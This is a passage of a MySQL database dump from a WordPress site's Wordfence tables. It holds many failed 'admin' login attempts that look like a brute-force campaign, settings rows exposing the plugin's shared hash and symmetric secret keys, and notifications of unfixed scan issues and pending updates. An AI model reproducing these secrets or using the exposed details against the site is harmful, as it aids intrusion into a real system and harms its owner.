Firefox/62.0'),(10600,37461,1569074170.498029,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼xþ…','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10601,37462,1569074202.991712,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿžEÉ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10602,37463,1569074252.459299,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿD·b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10603,37464,1569074319.136341,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¥ú†','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10604,37465,1569074321.800088,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ%»„k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10605,37466,1569074426.446055,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿŸAUi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10606,37467,1569074428.358204,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ²€Hu','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10607,37468,1569074471.425086,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿŠDõ‰','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10608,37469,1569074495.645474,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ3½f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10609,37470,1569074527.704349,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ2?Ì','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10610,37471,1569074528.496391,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ’ÿeØ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10611,37472,1569074529.630918,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¿ü`5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10612,37473,1569074563.816605,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿQ\0x\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10613,37474,1569074598.342631,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿæ¹ÿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10614,37475,1569074598.506603,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿŸAUi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10615,37476,1569074616.342220,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿk½~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10616,37477,1569074640.243721,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ.e¨—','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10617,37478,1569074686.772029,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿgQTŒ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10618,37479,1569074689.942831,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ<õ<—','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10619,37480,1569074692.427263,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ\r£','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10620,37481,1569074743.792365,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿæ\\þ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10621,37482,1569074781.149662,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ{3˜5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10622,37483,1569074786.205447,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÄ)z\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10623,37484,1569074885.015847,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ†Ñ•','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10624,37485,1569074897.991824,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿŸY”D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10625,37486,1569074931.269085,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼þn','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10626,37487,1569074939.101290,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¹¥vR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10627,37488,1569074964.843248,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÙö','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10628,37489,1569074967.789256,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿgZà›','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10629,37490,1569074993.268497,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ/[å»','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10630,37491,1569075019.600122,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÆ•','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10631,37492,1569075024.987965,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿoZŒd','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10632,37493,1569075105.440139,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ3KÍh','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10633,37494,1569075111.893503,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿhøî','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10634,37495,1569075131.977531,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ‹;«.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10635,37496,1569075162.796086,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿŠD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10636,37497,1569075177.061456,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿS‰\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10637,37498,1569075254.204197,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ|Ùëc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10638,37499,1569075259.405616,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ‹;dÿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10639,37500,1569075275.859503,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿŸËcD','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10640,37501,1569075318.419594,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿl³Û','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10641,37502,1569075328.404478,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿY‘J[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10642,37503,1569075337.935383,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ„”’æ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10643,37504,1569075360.211992,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ’¹·k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10644,37505,1569075400.749968,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ-u¨ì','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10645,37506,1569075429.401099,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÑÞ:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10646,37507,1569075451.278572,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ3MÁ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10647,37508,1569075464.184794,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ3þ¯¸','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10648,37509,1569075483.423323,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿE\0•Þ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10649,37510,1569075534.736503,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ3ÿS„','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10650,37511,1569075536.350907,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿpN\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10651,37512,1569075536.920418,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ-üø¡','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10652,37513,1569075554.724715,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÆÇF0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10653,37514,1569075636.282087,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¦>T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10654,37515,1569075637.118671,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ‹;^Ë','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10655,37516,1569075677.253275,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿY4','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10656,37517,1569075698.161684,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ€Çô–','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10657,37518,1569075740.152583,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¹4¥','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10658,37519,1569075745.016711,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿRÄÔ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10659,37520,1569075756.351063,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ²>¤n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10660,37521,1569075776.088699,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10661,37522,1569075831.264353,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿgâ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10662,37523,1569075846.175139,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ±$â','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10663,37524,1569075862.286354,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿxŠuf','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'),(10664,37525,1569075883.559061,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿžEÉ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10665,37526,1569075906.631519,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿCÆ‚ð','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10666,37527,1569075907.263899,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿŽ]ÓB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10667,37528,1569075961.796907,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿæ—=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10668,37529,1569076027.020982,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÆB#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10669,37530,1569076055.727783,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ6%Ó','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10670,37531,1569076063.690240,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¦oPß','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10671,37532,1569076067.085524,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿPÓ;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10672,37533,1569076094.166350,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿOb£','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10673,37534,1569076108.622007,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¥ã|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10674,37535,1569076156.811677,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ§rv‡','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10675,37536,1569076220.011866,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ\r£','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10676,37537,1569076223.262630,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÔãÐ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10677,37538,1569076227.511969,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÏ´Íø','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10678,37539,1569076287.651114,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ¼¦µ‹','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10679,37540,1569076308.735784,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÆB#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10680,37541,1569076313.644355,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÞïZ7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10681,37542,1569076324.725405,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ„”÷Ò','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10682,37543,1569076343.618438,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ3Ñ]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10683,37544,1569076393.161128,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ°	JÖ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10684,37545,1569076484.614594,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿÛk4\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10685,37546,1569076487.872993,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ<õ<—','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10686,37547,1569076502.209610,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ•Ò–9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10687,37548,1569076526.310194,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿk½Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10688,37550,1569076609.685677,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ÿÿ|Ùëc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0');
/*!40000 ALTER TABLE `wpdp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfls_2fa_secrets`
--

DROP TABLE IF EXISTS `wpdp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfls_2fa_secrets` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `secret` tinyblob NOT NULL,
  `recovery` blob NOT NULL,
  `ctime` int(10) unsigned NOT NULL,
  `vtime` int(10) unsigned NOT NULL,
  `mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfls_2fa_secrets`
--

LOCK TABLES `wpdp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wpdp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfls_settings`
--

DROP TABLE IF EXISTS `wpdp_wfls_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfls_settings` (
  `name` varchar(191) NOT NULL DEFAULT '',
  `value` longblob,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfls_settings`
--

LOCK TABLES `wpdp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wpdp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wpdp_wfls_settings` (`name`, `value`, `autoload`) VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1557886579','yes'),('ntp-offset','1.7743496894836','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','e20b4553e95b48209028a203926a5c940dfe83e71866870323035a7c81b6cf00','yes'),('shared-symmetric-secret','92666b50b1adce22a8ce5784513c9414f2cf3234721db4e275d7033b84dc7165','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wpdp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_wfnotifications`
--

DROP TABLE IF EXISTS `wpdp_wfnotifications`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_wfnotifications` (
  `id` varchar(32) NOT NULL DEFAULT '',
  `new` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `category` varchar(255) NOT NULL,
  `priority` int(11) NOT NULL DEFAULT '1000',
  `ctime` int(10) unsigned NOT NULL,
  `html` text NOT NULL,
  `links` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_wfnotifications`
--

LOCK TABLES `wpdp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wpdp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wpdp_wfnotifications` (`id`, `new`, `category`, `priority`, `ctime`, `html`, `links`) VALUES ('site-AEAAAAA',0,'wfplugin_updates',502,1545792817,'<a href=\"https://bintara.com.my/wp-admin/network/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-AIAAAAA',0,'wfplugin_scan',502,1545140100,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]'),('site-GAAAAAA',0,'wfplugin_scan',502,1545792826,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-BQAAAAA',0,'wfplugin_scan',502,1545792537,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-GEAAAAA',0,'wfplugin_scan',502,1547127375,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">4 issues found in most recent scan</a>','[]'),('site-I4AAAAA',0,'wfplugin_updates',502,1552035030,'<a href=\"https://bintara.com.my/wp-admin/network/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-KIAAAAA',0,'wfplugin_scan',502,1549510214,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-YYAAAAA',0,'wfplugin_scan',502,1549960075,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-3EAAAAA',0,'wfplugin_scan',502,1551493196,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">11 issues found in most recent scan</a>','[]'),('site-H4AQAAA',0,'wfplugin_updates',502,1552270613,'<a href=\"http://bintara.com.my/wp-admin/network/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-DMAQAAA',0,'wfplugin_scan',502,1552035030,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-IAAQAAA',0,'wfplugin_scan',502,1552270618,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-IEAQAAA',0,'wfplugin_updates',502,1555313565,'<a href=\"https://bintara.com.my/wp-admin/network/update-core.php\">Updates are available for 1 plugin and 1 theme</a>','[]'),('site-IIAQAAA',0,'wfplugin_scan',502,1555313565,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">2 issues found in most recent scan</a>','[]'),('site-XAAQAAA',0,'wfplugin_updates',502,1555640236,'<a href=\"https://bintara.com.my/wp-admin/network/update-core.php\">Updates are available for 6 plugins</a>','[]'),('site-XEAQAAA',0,'wfplugin_scan',502,1555690876,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">6 issues found in most recent scan</a>','[]'),('site-Y4AQAAA',0,'wfplugin_updates',502,1556077506,'<a href=\"https://bintara.com.my/wp-admin/network/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-ZAAQAAA',0,'wfplugin_scan',502,1556077506,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-3UAQAAA',0,'wfplugin_updates',502,1556504269,'<a href=\"https://bintara.com.my/wp-admin/network/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-3YAQAAA',0,'wfplugin_scan',502,1556504274,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-5UAQAAA',1,'wfplugin_updates',502,1571971170,'<a href=\"https://bintara.com.my/wp-admin/network/update-core.php\">Updates are available for WordPress (v5.2.4) and 19 plugins</a>','[]'),('site-5YAQAAA',0,'wfplugin_scan',502,1569119135,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">16 issues found in most recent scan</a>','[]'),('site-AMCAAAA',0,'wfplugin_scan',502,1569378313,'<a href=\"https://bintara.com.my/wp-admin/network/admin.php?page=WordfenceScan\">18 issues found in most recent scan</a>','[]'),('site-BMCAAAA',0,'wfplugin_scan',502,1569637585,'<a 